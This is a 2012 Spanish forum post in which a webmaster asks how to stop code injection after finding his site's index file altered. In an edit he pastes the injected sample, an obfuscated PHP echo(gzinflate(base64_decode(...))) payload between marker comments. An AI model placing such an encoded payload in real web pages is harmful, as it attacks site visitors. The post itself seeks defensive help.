Ver Mensaje Individual
  #1 (permalink)  
Antiguo 20/03/2012, 10:12
Avatar de xarmagedonx
xarmagedonx
 
Fecha de Ingreso: marzo-2009
Mensajes: 360
Antigüedad: 15 años, 8 meses
Puntos: 29
Busqueda Inyección de código, como lo soluciono?

Hola a todos, hoy a la mañana note algo raro en mi web, ya que no podía acceder desde mi celular, cuando volvi a mi casa, intente ingresar y marcaba error.

Examiné el index y me habían inyectado un código como este: encode(64(( y aca un monton de texto)))

No pude copiarlo porque lo borre enseguida para que volviera a funcionar. Pero como puedo evitar este tipo de ataques??. Yo habia puesto en el código algunas recomendaciones que dan para evitar inyecciones, pero supongo que el problema estará en el paginador.

Si necesitan la web es la N°2 de mi firma. Saludos y gracias!!


EDITO: aca tengo el codigo...
Código MySQL:
Ver original
  1. #d93065#
  2. echo(gzinflate(base64_decode("TYvLDYAgDEBXIR2A3g1yd4yKjUIQSalGt9eEi9f3cS1IrGr0qTyC8q2Y6KJOwWQq60nrp/60SRhhU60DYizKIrzYcOyWBHHav75wwxxnIXlsamC8wz77Fw==")));
  3. #/d93065#